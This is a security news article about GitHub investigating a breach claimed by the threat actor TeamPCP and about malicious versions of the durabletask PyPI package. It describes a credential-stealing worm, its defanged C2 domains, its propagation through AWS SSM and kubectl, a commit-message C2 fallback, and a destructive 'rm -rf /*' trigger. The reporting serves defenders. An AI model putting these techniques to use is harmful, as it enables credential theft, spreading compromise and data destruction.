GitHub on Tuesday said it’s investigating unauthorized access to its internal repositories after the notorious threat actor known as TeamPCP listed the platform’s source code and internal organizations for sale on a cybercrime forum.
“While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity,” the Microsoft-owned subsidiary said.
The company also noted that it will notify customers via established incident response and notification channels if any impact is discovered.
The development comes after TeamPCP, a threat actor behind a string of software supply chain attacks targeting open-source packages, listed GitHub’s source code for sale for an asking price of no less than $50,000. The alleged data dump is said to include about 4,000 repositories.
“As always, this is not a ransom,” the group said in a post, according to screenshots shared by Dark Web Informer. “We do not care about extorting GitHub, 1 buyer and we shred the data on our end, it looks like our retirement is soon so if no buyer is found, we leak it for free.”
TeamPCP Compromises durabletask PyPI Package
News of the sale comes as TeamPCP’s self-replicating malware campaign, known as Mini Shai-Hulud, continues to expand in reach with the compromise of durabletask, an official Microsoft Python client for the Durable Task workflow execution framework. Three malicious package versions have been identified: 1.4.1, 1.4.2, and 1.4.3.
“The attacker compromised a GitHub account via a previous attack, dumped GitHub secrets from a repository to which the user had access, and from there had access to the PyPi token to publish directly,” Google-owned Wiz said.
The payload embedded into the package is a dropper, which is configured to fetch and run a second-stage payload (“rope.pyz”) from an external server (“check.git-service[.]com”). The malware is assessed to be an evolution of the payload deployed in connection with the compromise of the guardrails-ai package last week.
Specifically, it’s designed to activate a full-featured infostealer that’s capable of harvesting credentials associated with major cloud providers, password managers, and developer tools, and exfiltrating the data to the attacker-controlled domain. It’s worth noting that the stealer is configured to execute only on Linux systems.
According to SafeDep, the 28KB Python stealer also attempts to read HashiCorp Vault KV secrets, unlock and dump 1Password and Bitwarden password vaults, and access SSH keys, Docker credentials, VPN configurations, and shell history.
“If the machine is running inside AWS, it propagates itself to other EC2 instances using SSM. If it’s inside Kubernetes, it propagates through kubectl exec,” Aikido Security said. “And if it detects Israeli or Iranian system settings, there’s a 1-in-6 chance it plays audio and then runs rm -rf /*.”
“After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile,” per StepSecurity. “The propagation script downloads the payload from the primary C2, falling back to the secondary domain t.m-kosche[.]com, and runs it in the background.”
Also notable is the use of the FIRESCALE mechanism to identify a backup command-and-control (C2) address in the event the primary domain is unreachable. It does this by searching GitHub’s public commit messages for the pattern “FIRESCALE <base64_url>.<base64_signatue>” and extracting the C2 information from it. Details of this technique were previously highlighted by Hunt.io.
Because the worm propagates using tokens stolen from infected environments, the number of affected packages is expected to grow. Any machine or pipeline that installed an affected version of the package should be treated as fully compromised.
“The package is downloaded roughly 417,000 times a month, and the malicious code runs automatically the moment the package is imported, with no error messages and no visible signs of compromise,” Endor Labs researcher Peyton Kennedy said.
